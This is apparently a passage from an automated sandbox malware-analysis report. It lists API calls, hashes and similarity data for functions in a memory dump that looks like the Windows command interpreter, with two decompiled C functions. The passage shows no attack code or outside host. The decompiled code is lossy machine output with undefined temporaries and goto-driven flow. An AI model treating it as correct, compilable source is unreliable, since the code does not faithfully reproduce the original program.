                                                      • Part of subcall function 011F2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,011F1838,?), ref: 011F2D7C
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                                      • Part of subcall function 011F2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,011F26A5,?), ref: 011F2DBD
                                                      • Part of subcall function 011F2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,011F26A5,?), ref: 011F2DC6
                                                      • Part of subcall function 011F2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,011F26A5,?), ref: 011F2DDF
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
                                                    • String ID:
                                                    • API String ID: 2383944720-0
                                                    • Opcode ID: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                                    • Instruction ID: 80a31ae270d6647d85b80ab13ddfc60267b43e5048c5ec5cad5e65a9cb50fdb9
                                                    • Opcode Fuzzy Hash: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                                    • Instruction Fuzzy Hash: 7D21A130601516ABDF2DEF6AE86896EBB69FF60714714822DEB0583544DF30D891CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F6E90, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                                    • _wcsicmp.MSVCRT ref: 011F6EFC
                                                    • _wcsicmp.MSVCRT ref: 011F6F1B
                                                    • _wcsicmp.MSVCRT ref: 011F6F41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmpwcschr$iswspace
                                                    • String ID: KEYS$LIST$OFF
                                                    • API String ID: 3924973218-4129271751
                                                    • Opcode ID: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                                    • Instruction ID: 1e7c37c61c9c63b0c04d1cd5086850bc3b94e1d06a47020f7c0a798409792fff
                                                    • Opcode Fuzzy Hash: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                                    • Instruction Fuzzy Hash: 33118C32708712EAA31DEB2EFC698237798FBE4624391801EE703861C6DF215C41C763
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E0178, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011E0183
                                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011E01B8
                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000001), ref: 011E01C7
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E01D2
                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E01DB
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 513048808-0
                                                    • Opcode ID: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                                    • Instruction ID: 44af7ff06a87fcd81453e106437cc6fc443c273649ccdf173e83130d95c542f6
                                                    • Opcode Fuzzy Hash: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                                    • Instruction Fuzzy Hash: 6811E333D04A51ABEB29C7ACA90CB7B3AFCE759235F150315F82696084CBB4C980C752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E269C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011E26A7
                                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 513048808-0
                                                    • Opcode ID: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                                    • Instruction ID: 79ae1ad7e29900b8fcc99a4db4bca68fb94ce915f47b133b4d7319d3cc6efc41
                                                    • Opcode Fuzzy Hash: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                                    • Instruction Fuzzy Hash: 3A01F733C14C246B9E3952FCAC6CDBB36DCE6652347210321FC25D24C5DF758C854691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DFE10, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E011DFE10(void* __ebx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t38;
				signed int _t49;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t73;
				signed int _t75;
				void* _t78;
				signed int _t79;
				short* _t80;
				signed int _t83;
				void* _t89;
				signed int _t91;
				signed int _t93;
				void* _t95;
				void* _t99;
				signed int _t102;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t120;
				void* _t121;

				_t121 = _t120 - 0x14;
				_push(_t113);
				_t79 = 0x4002;
				_t35 = E011E00B0(0x4002);
				_v8 = _t35;
				_t104 = _t35;
				if(_t35 == 0) {
					memset(0x1203890, 0, 0x4006);
					_t121 = _t121 + 0xc;
					 *0x120b8a4 = 0x1203892;
					__imp__longjmp(0x120b8f8, 0xffffffff);
					goto L37;
				} else {
					_t113 =  *0x120b8a4;
					_t102 = 0x2001;
					_t79 = _t35;
					_t78 = _t113 - _t35;
					while(1) {
						_t2 = _t102 + 0x7fffdffd; // 0x7ffffffe
						if(_t2 == 0) {
							break;
						}
						_t73 =  *(_t78 + _t79) & 0x0000ffff;
						if(_t73 == 0) {
							break;
						} else {
							 *_t79 = _t73;
							_t79 = _t79 + 2;
							_t102 = _t102 - 1;
							if(_t102 != 0) {
								continue;
							} else {
								L37:
								_t80 = _t79 - 2;
							}
						}
						goto L7;
					}
					__eflags = _t102;
					if(_t102 == 0) {
						goto L37;
					}
				}
				L7:
				_t75 = 0;
				 *_t80 = 0;
				_t81 = _t104;
				_v12 = 0;
				_t38 =  *_t104 & 0x0000ffff;
				if(_t38 == 0) {
					L13:
					 *0x120b8a4 = 0x1203892;
					 *_t113 = 0;
					if(_t75 > 0x2001) {
						__eflags = 0;
						 *0x1203892 = 0;
						goto L40;
					} else {
						return E011E0040(_t81);
					}
				} else {
					while(1) {
						_t83 = _t104;
						_t104 = _t104 + 2;
						_v16 = _t83;
						if(_t75 > 0x2001) {
							break;
						}
						if(_t38 == 0x25) {
							_t93 =  *0x1213cc4;
							__eflags = _t93;
							if(__eflags == 0) {
								L19:
								_t81 = E011D8F70(0x120b8f8, _t104, __eflags,  &_v12, 0x25);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  *0x1213cc4;
									_t113 =  *0x120b8a4;
									if( *0x1213cc4 == 0) {
										goto L33;
									} else {
										_t104 = _v16 + (_v12 + 1) * 2;
									}
									goto L11;
								} else {
									goto L20;
								}
							} else {
								_t54 =  *_t104 & 0x0000ffff;
								__eflags = _t54 - 0x25;
								if(_t54 == 0x25) {
									_t29 = _t83 + 4; // 0x4
									_t104 = _t29;
									L33:
									 *_t113 = 0x25;
									_t113 = _t113 + 2;
									_t75 = _t75 + 1;
									goto L24;
								} else {
									__eflags = _t54 - 0x2a;
									if(_t54 == 0x2a) {
										__eflags =  *0x1213cc9;
										if( *0x1213cc9 == 0) {
											goto L18;
										} else {
											_t99 =  *(_t93 + 0x34);
											_t18 = _t83 + 4; // 0x4
											_t104 = _t18;
											__eflags = _t99;
											if(_t99 == 0) {
												goto L11;
											} else {
												_t89 = _t99;
												_v16 = _t89 + 2;
												do {
													_t59 =  *_t89;
													_t89 = _t89 + 2;
													__eflags = _t59;
												} while (_t59 != 0);
												_t91 = _t89 - _v16 >> 1;
												_v20 = _t91;
												__eflags = _t91;
												if(_t91 <= 0) {
													goto L11;
												} else {
													_t60 = _t91 + _t75;
													_v16 = _t60;
													__eflags = _t60 - 0x2000;
													if(_t60 > 0x2000) {
														memcpy(_t113, _t99, 0x2000 - _t75 + 0x2000 - _t75);
														 *0x1207892 = 0;
														E011DC5A2(_t91, 0x234f, 1, 0x1203892);
														goto L41;
													} else {
														E011E1040(_t113, 0x2003 - (_t113 - 0x1203890 >> 1), _t99);
														_t75 = _v16;
														_t113 = _t113 + _v20 * 2;
														 *0x120b8a4 = _t113;
														goto L11;
													}
												}
											}
										}
									} else {
										L18:
										_t81 = E011E1969(0x120b8f8, _t104,  &_v12, L"0123456789", _t93 + 0x3c);
										__eflags = _t81;
										if(__eflags != 0) {
											L20:
											_t108 = _t81;
											_t10 = _t108 + 2; // 0x2
											_t95 = _t10;
											do {
												_t49 =  *_t108;
												_t108 = _t108 + 2;
												__eflags = _t49;
											} while (_t49 != 0);
											_t110 = _t108 - _t95 >> 1;
											_t75 = _t75 + _t110;
											__eflags = _t75 - 0x2001;
											if(_t75 > 0x2001) {
												L40:
												_push(0);
												_push(0x233f);
												E011DC5A2(_t81);
												L41:
												_t82 = _v8;
												E011E0040(_v8);
												__imp__longjmp(0x120b8f8, 0xffffffff);
												asm("int3");
												_push(0);
												_push(8);
												E011DC5A2(_t82);
												__eflags = 0;
												return 0;
											} else {
												_t116 =  *0x120b8a4;
												E011E1040(_t116, 0x2003 - (_t116 - 0x1203890 >> 1), _t81);
												_t113 = _t116 + _t110 * 2;
												_t112 = _v12 + 1;
												__eflags = _t112;
												_t104 = _v16 + _t112 * 2;
												L24:
												 *0x120b8a4 = _t113;
												goto L11;
											}
										} else {
											goto L19;
										}
									}
								}
							}
						} else {
							 *_t113 = _t38;
							_t75 = _t75 + 1;
							_t113 = _t113 + 2;
							 *0x120b8a4 = _t113;
							if(_t38 == 0xa) {
								break;
							} else {
								L11:
								_t38 =  *_t104 & 0x0000ffff;
								if(_t38 != 0) {
									continue;
								} else {
									break;
								}
							}
						}
						goto L43;
					}
					_t81 = _v8;
					goto L13;
				}
				L43:
			}

































                                                    0x011dfe15
                                                    0x011dfe19
                                                    0x011dfe1b
                                                    0x011dfe20
                                                    0x011dfe25
                                                    0x011dfe28
                                                    0x011dfe2c
                                                    0x011ec954
                                                    0x011ec959
                                                    0x011ec95c
                                                    0x011ec96d
                                                    0x00000000
                                                    0x011dfe32
                                                    0x011dfe32
                                                    0x011dfe38
                                                    0x011dfe3f
                                                    0x011dfe41
                                                    0x011dfe43
                                                    0x011dfe43
                                                    0x011dfe4b
                                                    0x00000000
                                                    0x00000000
                                                    0x011dfe4d
                                                    0x011dfe54
                                                    0x00000000
                                                    0x011dfe56
                                                    0x011dfe56
                                                    0x011dfe59
                                                    0x011dfe5c
                                                    0x011dfe5f
                                                    0x00000000
                                                    0x011dfe61
                                                    0x011ec973
                                                    0x011ec973
                                                    0x011ec973
                                                    0x011dfe5f
                                                    0x00000000
                                                    0x011dfe54
                                                    0x011dfe66
                                                    0x011dfe68
                                                    0x00000000
                                                    0x00000000
                                                    0x011dfe68
                                                    0x011dfe6e
                                                    0x011dfe70
                                                    0x011dfe72
                                                    0x011dfe75
                                                    0x011dfe77
                                                    0x011dfe7a
                                                    0x011dfe80
                                                    0x011dfeb6
                                                    0x011dfeb8
                                                    0x011dfec2
                                                    0x011dfecb
                                                    0x011ec9ad
                                                    0x011ec9af
                                                    0x00000000
                                                    0x011dfed1
                                                    0x011dfedc
                                                    0x011dfedc
                                                    0x011dfe82
                                                    0x011dfe82
                                                    0x011dfe82
                                                    0x011dfe84
                                                    0x011dfe87
                                                    0x011dfe90
                                                    0x00000000
                                                    0x00000000
                                                    0x011dfe96
                                                    0x011dfedd
                                                    0x011dfee3
                                                    0x011dfee5
                                                    0x011dff1b
                                                    0x011dff2d
                                                    0x011dff2f
                                                    0x011dff31
                                                    0x011e0022
                                                    0x011e0029
                                                    0x011e002f
                                                    0x00000000
                                                    0x011e0031
                                                    0x011e0038
                                                    0x011e0038
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dfee7
                                                    0x011dfee7
                                                    0x011dfeea
                                                    0x011dfeed
                                                    0x011e000e
                                                    0x011e000e
                                                    0x011e0011
                                                    0x011e0016
                                                    0x011e0019
                                                    0x011e001c
                                                    0x00000000
                                                    0x011dfef3
                                                    0x011dfef3
                                                    0x011dfef6
                                                    0x011dff93
                                                    0x011dff9a
                                                    0x00000000
                                                    0x011dffa0
                                                    0x011dffa0
                                                    0x011dffa3
                                                    0x011dffa3
                                                    0x011dffa6
                                                    0x011dffa8
                                                    0x00000000
                                                    0x011dffae
                                                    0x011dffae
                                                    0x011dffb3
                                                    0x011dffb6
                                                    0x011dffb6
                                                    0x011dffb9
                                                    0x011dffbc
                                                    0x011dffbc
                                                    0x011dffc4
                                                    0x011dffc6
                                                    0x011dffc9
                                                    0x011dffcb
                                                    0x00000000
                                                    0x011dffd1
                                                    0x011dffd1
                                                    0x011dffd4
                                                    0x011dffd7
                                                    0x011dffdc
                                                    0x011ec987
                                                    0x011ec991
                                                    0x011ec9a3
                                                    0x00000000
                                                    0x011dffe2
                                                    0x011dfff5
                                                    0x011dfffd
                                                    0x011e0000
                                                    0x011e0003
                                                    0x00000000
                                                    0x011e0003
                                                    0x011dffdc
                                                    0x011dffcb
                                                    0x011dffa8
                                                    0x011dfefc
                                                    0x011dfefc
                                                    0x011dff15
                                                    0x011dff17
                                                    0x011dff19
                                                    0x011dff37
                                                    0x011dff37
                                                    0x011dff39
                                                    0x011dff39
                                                    0x011dff40
                                                    0x011dff40
                                                    0x011dff43
                                                    0x011dff46
                                                    0x011dff46
                                                    0x011dff4d
                                                    0x011dff4f
                                                    0x011dff51
                                                    0x011dff57
                                                    0x011ec9b5
                                                    0x011ec9b5
                                                    0x011ec9b7
                                                    0x011ec9bc
                                                    0x011ec9c4
                                                    0x011ec9c4
                                                    0x011ec9c7
                                                    0x011ec9d3
                                                    0x011ec9d9
                                                    0x011ec9da
                                                    0x011ec9dc
                                                    0x011ec9de
                                                    0x011ec9e6
                                                    0x011ec9e9
                                                    0x011dff5d
                                                    0x011dff5d
                                                    0x011dff76
                                                    0x011dff7e
                                                    0x011dff84
                                                    0x011dff84
                                                    0x011dff85
                                                    0x011dff88
                                                    0x011dff88
                                                    0x00000000
                                                    0x011dff88
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dff19
                                                    0x011dfef6
                                                    0x011dfeed
                                                    0x011dfe98
                                                    0x011dfe98
                                                    0x011dfe9b
                                                    0x011dfe9c
                                                    0x011dfe9f
                                                    0x011dfea9
                                                    0x00000000
                                                    0x011dfeab
                                                    0x011dfeab
                                                    0x011dfeab
                                                    0x011dfeb1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dfeb1
                                                    0x011dfea9
                                                    0x00000000
                                                    0x011dfe96
                                                    0x011dfeb3
                                                    0x00000000
                                                    0x011dfeb3
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • memset.MSVCRT ref: 011EC954
                                                    • longjmp.MSVCRT(0120B8F8,000000FF,00000000,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC96D
                                                    • memcpy.MSVCRT ref: 011EC987
                                                    • longjmp.MSVCRT(0120B8F8,000000FF,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC9D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                    • String ID: 0123456789
                                                    • API String ID: 2034586978-2793719750
                                                    • Opcode ID: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                                    • Instruction ID: 892ae28ae374b134047c022107edaa056674a4bc3f41c6ec0e2555b9fa4dbe0b
                                                    • Opcode Fuzzy Hash: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                                    • Instruction Fuzzy Hash: 69712635B002179FEB2DDA6CD84C76A7BE1EF84704F194169D906AB386EB709B43C781
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F85E9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E011F85E9(intOrPtr __ecx, signed int __edx) {
				signed int _v20;
				int _v32;
				char _v36;
				int _v40;
				void _v560;
				int _v568;
				char _v572;
				int _v576;
				void _v1096;
				int _v1104;
				char _v1108;
				int _v1112;
				void* _v1124;
				void _v1632;
				intOrPtr _v1636;
				signed int _v1640;
				int _v1644;
				signed int* _v1648;
				signed int* _v1652;
				signed int _v1656;
				intOrPtr _v1660;
				char _v1664;
				void* _v1668;
				void* _v1672;
				void* _v1676;
				void* _v1680;
				void* _v1684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t196;
				signed int _t198;
				void* _t218;
				void* _t232;
				signed int _t236;
				void* _t237;
				signed int _t239;
				void* _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				signed char _t258;
				intOrPtr _t260;
				void* _t263;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t282;
				signed int _t290;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t295;
				void* _t296;
				signed int _t297;
				void* _t298;
				signed int _t299;
				void* _t300;
				void* _t303;
				intOrPtr _t305;
				signed int _t307;
				void* _t316;
				void* _t317;
				signed int _t346;
				void* _t348;
				void* _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				void* _t357;
				WCHAR* _t358;
				signed int _t359;
				signed int _t368;
				intOrPtr _t371;
				signed int _t392;
				signed int _t412;
				void* _t414;
				signed int _t416;
				signed int _t418;
				intOrPtr _t419;
				void* _t420;
				signed int* _t421;
				void* _t422;
				signed int _t426;
				signed int _t428;
				signed int _t431;
				void* _t435;

				_t391 = __edx;
				_t318 = __ecx;
				_t418 = __edx;
				if(__ecx != 0) {
					_push(0);
					_push(__ecx);
					E011DC108(__ecx);
					_pop(_t318);
				}
				if(_t418 == 1) {
					_t418 = 0x1213d00;
					E011E274C(0x1213d00, 0x104, L"%9d",  *0x11fd56c);
					E011DC108(_t318, 0x2336, 1, 0x1213d00);
					_t426 = _t426 + 0x1c;
				}
				 *0x11fd560 =  *0x1218064 & 0x000000ff;
				while(1) {
					_t196 =  *0x11fd5dc; // 0x0
					_t435 =  *0x11fd568 - _t196; // 0x0
					if(_t435 >= 0) {
						break;
					}
					_t318 =  *((intOrPtr*)( *0x1213cf4 + _t196 * 4 - 4));
					E011DCD27(_t318);
				}
				__imp__longjmp(0x120b8f8, 1);
				asm("int3");
				_t428 = (_t426 & 0xfffffff8) - 0x67c;
				_t198 =  *0x11fd0b4; // 0x1805bc26
				_v20 = _t198 ^ _t428;
				_push(_t418);
				_push(_t412);
				_v1640 = _t391;
				_t419 = _t318;
				_v1104 = 0x104;
				_v1644 = 0;
				_t316 = 1;
				_v1112 = 0;
				_t413 = _t412 | 0xffffffff;
				_v1108 = 1;
				memset( &_v1632, 0, 0x104);
				_v36 = 1;
				_v32 = 0x104;
				_v40 = 0;
				memset( &_v560, 0, 0x104);
				_v572 = 1;
				_v568 = 0x104;
				_v576 = 0;
				memset( &_v1096, 0, 0x104);
				_t431 = _t428 + 0x24;
				if(E011E0C70( &_v1632, ((0 | _v1108 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v560, ((0 | _v36 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1096, ((0 | _v572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L141:
					E011E0DE8(E011E0DE8(E011E0DE8(_t214,  &_v1096),  &_v560),  &_v1632);
					_t218 = _t316;
				} else {
					_t214 = E011D585F(0xfe00,  &_v1648, 0);
					_v1668 = _t214;
					if(_t214 == 0) {
						goto L141;
					} else {
						if( *0x11fd560 == 0) {
							_t232 = _v1648;
							goto L17;
						} else {
							_v1652 = _v1648;
							_t214 = E011D585F(_v1648,  &_v1668, 1);
							_v1652 = _t214;
							if(_t214 != 0) {
								if(_v1648 >= _v1668) {
									_t232 = _v1668;
									L17:
									_v1652 = _t232;
								}
								_t421 =  *(_t419 + 0x20);
								_v1648 = _t421;
								while(1) {
									_t214 = E011DAD44( *_t421);
									if(_t214 != 0) {
										break;
									}
									_t421 = _t421[8];
									_v1648 = _t421;
									if(_t421 != 0) {
										continue;
									} else {
										_t316 = _t214;
										goto L141;
									}
									goto L142;
								}
								_t391 =  *_t421;
								__eflags = 0;
								E011E68BA(E011E6A00,  *_t421, 0x21, 0, _t421[6],  &_v1664);
								while(1) {
									_t421[7] = _t421[7] & 0xffff3fff;
									_t236 = _t421[7];
									__eflags = _t236 & 0x00000004;
									if((_t236 & 0x00000004) != 0) {
										_t307 = _t236 & 0xfffffffb | 0x00000002;
										__eflags = _t307;
										_t421[7] = _t307;
									}
									__eflags =  *0x11fd544;
									if( *0x11fd544 != 0) {
										break;
									}
									_t391 = _v40;
									__eflags = _v40;
									if(_v40 == 0) {
										_t391 =  &_v560;
									}
									_t237 = E011D579C(_t421, _t391, _v32);
									__eflags = _t237 - _t316;
									if(_t237 == _t316) {
										break;
									} else {
										_push(_t421[1]);
										E011E25D9(L"%s\r\n");
										_t239 = _v1112;
										__eflags = _t239;
										if(_t239 == 0) {
											_t239 =  &_v1632;
										}
										_t391 = _v1640;
										_t240 = E011D5226(_t421, _v1640, _t239, _v1104, 0);
										__eflags = _t240 - _t316;
										if(_t240 == _t316) {
											break;
										} else {
											_t392 = _v1112;
											_t241 = _t392;
											__eflags = _t392;
											if(_t392 == 0) {
												_t241 =  &_v1632;
											}
											__eflags =  *_t241;
											if( *_t241 != 0) {
												__eflags = _t392;
												if(_t392 == 0) {
													_t392 =  &_v1632;
												}
												_t244 = E011F8F66(_t421[1], _t392);
												_t346 = _t421[1];
												__eflags = _t244;
												if(_t244 == 0) {
													_t422 = E011D5DB5(_t346, (_t421[7] & 0x00000800) << 0xa, _t346, _t346);
													__eflags = _t422 - 0xffffffff;
													if(_t422 == 0xffffffff) {
														E011DCD27(_v1664);
														L135:
														_t348 = 0x6e;
														E011F985A(_t348);
														L130:
														__eflags = 0;
														E011F85E9(0, _t316);
														L131:
														E011DCD27(_v1664);
														E011DDB92(_t422);
														_t352 = _v1668;
														L129:
														E011DDB92(_t352);
														goto L130;
													}
													_t252 = E011E0178(_t245);
													__eflags = _t252;
													if(_t252 == 0) {
														_t354 = _v1652;
													} else {
														_t354 = 0x80;
														_v1652 = 0x80;
													}
													_t253 = _v1112;
													__eflags = _t253;
													if(_t253 == 0) {
														_t253 =  &_v1632;
													}
													_t415 = _v1648;
													_t255 = E011D5712(_t422, _v1660, _t354,  &_v1656, _v1648, _t413, _t253);
													__eflags =  *0x1213cf0;
													_v1656 = _t255;
													if( *0x1213cf0 != 0) {
														_t356 = _v1664;
														L137:
														E011DCD27(_t356);
														_t357 = _t422;
														L134:
														E011DDB92(_t357);
														goto L135;
													}
													_t358 = _v1112;
													__eflags = _t358;
													if(_t358 == 0) {
														_t358 =  &_v1632;
													}
													_t258 = GetFileAttributesW(_t358);
													_t359 = _v1112;
													__eflags = _t258 & 0x00000002;
													if((_t258 & 0x00000002) != 0) {
														__eflags = _t359;
														if(_t359 == 0) {
															_t359 =  &_v1632;
														}
														_t360 = E011D5DB5(_t359, _t316, _t359, _t359);
														_v1680 = _t360;
														_v1676 = _t360;
													} else {
														__eflags = _t359;
														if(__eflags == 0) {
															_t359 =  &_v1632;
														}
														_t303 = E011D43A0(_t359, __eflags);
														_v1672 = _t303;
														_v1668 = _t303;
														__eflags = _t303 - 0xffffffff;
														if(_t303 == 0xffffffff) {
															L136:
															_t356 = _v1664;
															goto L137;
														}
														__imp___get_osfhandle(_t303);
														SetEndOfFile(_t303);
														_t360 = _v1672;
													}
													__eflags = _t360 - 0xffffffff;
													if(_t360 == 0xffffffff) {
														goto L136;
													}
													__eflags =  *0x11fd5cc;
													if( *0x11fd5cc == 0) {
														L69:
														_t260 = _v1636;
														while(1) {
															__eflags = _t260 - _t316;
															if(_t260 != _t316) {
																goto L84;
															}
															_t291 = _v1112;
															__eflags = _t291;
															if(_t291 == 0) {
																_t291 =  &_v1632;
															}
															_t292 = E011F916C(_t360, _v1660, _v1656, _t291, _t422);
															__eflags =  *0x11fd560;
															_t382 = _v1684;
															if( *0x11fd560 != 0) {
																_t295 = E011E0178(_t292);
																__eflags = _t295;
																if(_t295 != 0) {
																	_t382 = _v1672;
																} else {
																	_t408 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t408 =  &_v1632;
																	}
																	_t296 = E011F84FE(_t295, _t408, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t296 - _t316;
																	if(_t296 == _t316) {
																		goto L131;
																	}
																	_t382 = _v1668;
																	_v1672 = _v1668;
																}
															}
															_t293 = _v1112;
															__eflags = _t293;
															if(_t293 == 0) {
																_t293 =  &_v1632;
															}
															_t260 = E011D5712(_t422, _v1660, _v1652,  &_v1656, _t415, _t382, _t293);
															__eflags =  *0x11fd5cc;
															if( *0x11fd5cc == 0) {
																_t360 = _v1672;
																continue;
															}
															goto L84;
														}
													} else {
														__eflags = _v1656;
														if(_v1656 > 0) {
